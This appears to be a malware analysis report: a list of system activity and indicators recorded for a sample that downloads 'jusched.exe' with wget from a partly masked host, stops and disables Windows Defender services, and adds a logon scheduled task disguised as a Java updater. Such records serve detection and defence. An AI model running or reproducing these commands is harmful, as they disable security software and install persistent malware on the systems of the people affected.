Техническая информация
- %TEMP%\1.tmp\wget.exe http://sh##t.in/jusched.exe -O jusched.exe -q
- <SYSTEM32>\sc.exe stop WinDefend
- <SYSTEM32>\net1.exe stop WinDefend
- <SYSTEM32>\net.exe stop WinDefend
- <SYSTEM32>\schtasks.exe /create /SC ONLOGON /TN java-update-scheduler /TR C:\jusched.exe /RL HIGHEST
- <SYSTEM32>\net1.exe config WinDefend start= disabled
- <SYSTEM32>\sc.exe config WinDefend start= disabled
- <SYSTEM32>\net1.exe stop MsMpSvc
- <SYSTEM32>\net.exe stop MsMpSvc
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\command.bat""
- <SYSTEM32>\sc.exe config MsMpSvc start= disabled
- <SYSTEM32>\net1.exe config MsMpSvc start= disabled
- <SYSTEM32>\sc.exe stop MsMpSvc
- %TEMP%\1.tmp\jusched.exe
- C:\jusched.exe
- %TEMP%\1.tmp\command.bat
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\command.bat
- %TEMP%\1.tmp\wget.exe
- 'sh##t.in':80
- sh##t.in/jusched.exe
- DNS ASK sh##t.in